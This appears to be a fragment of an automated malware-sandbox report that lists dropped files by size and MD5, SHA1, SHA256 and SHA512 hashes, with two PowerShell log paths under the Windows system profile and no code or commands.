SHA161b9365716059084fb53364665b87df0bbbf2ea5
SHA256161c487addec818c7d20f9adf9c94261d311605cb0c01e46cc7b9b74e80c75ca
SHA51252183db4f08cc1b07b5cdf964cea596e8c7716fd0d4b533e4ebdc3adae03edd6e7462db00bf64b6b557b73464b0ebe8ad67bf29cda2db2bb8ec4aa2832ff6b7b
-
Filesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
Filesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
Filesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
Filesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5313669c7714877e8056352e6a8bcc4a6
SHA164bd4029202315b6225f040f6ec9bf0d248448fe
SHA256875cd55f5901ab5e882ffab459a4838b52ba7978408fab50df503e4605788336
SHA5123aec154446a3e1e18471dd2fb9cc2d76d196abf118d67716634a07671c8ca0792cfaf1a894fd4ebeb9a89d1a94580fa92ae6b99e3fa6677fd03934be1093a7da
-
Filesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
Filesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
Filesize
6.2MB
MD5f0fad138bb903a81e0b9fd9edf631215
SHA137411e038b79a2b5112745205962363fdbf5c9a6
SHA256568d78fef0993fe7df30f552435b565b9c45213b0c9384c32f06d3eab294f53a
SHA512928a781ed9b11afb02c8bdca52d2739f11ab949aae488d9da63fb3f6d9b34a95646c21bc152541e50e558418abf78150e3caa55622e678d8d1369dff181c33f8
-
Filesize
6.2MB
MD5f0fad138bb903a81e0b9fd9edf631215
SHA137411e038b79a2b5112745205962363fdbf5c9a6
SHA256568d78fef0993fe7df30f552435b565b9c45213b0c9384c32f06d3eab294f53a
SHA512928a781ed9b11afb02c8bdca52d2739f11ab949aae488d9da63fb3f6d9b34a95646c21bc152541e50e558418abf78150e3caa55622e678d8d1369dff181c33f8
-
Filesize
5KB
MD59b351c1584d60de8f69131f2512dfe63
SHA1aff1b35482345fcda0a921069ce159a7782cdb41
SHA25671ed914077f61b57a799a8933668fd6eaaf79b2d8df1462c10cb41ddcbba795f
SHA5122bc1064daea504997fb5035b2120e44cb924eca9323313eb941706b075b33e6969fb6a2e90f20164354506eb4166f1d6d3a1f2b08af404151cfa912360e0c1b2
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732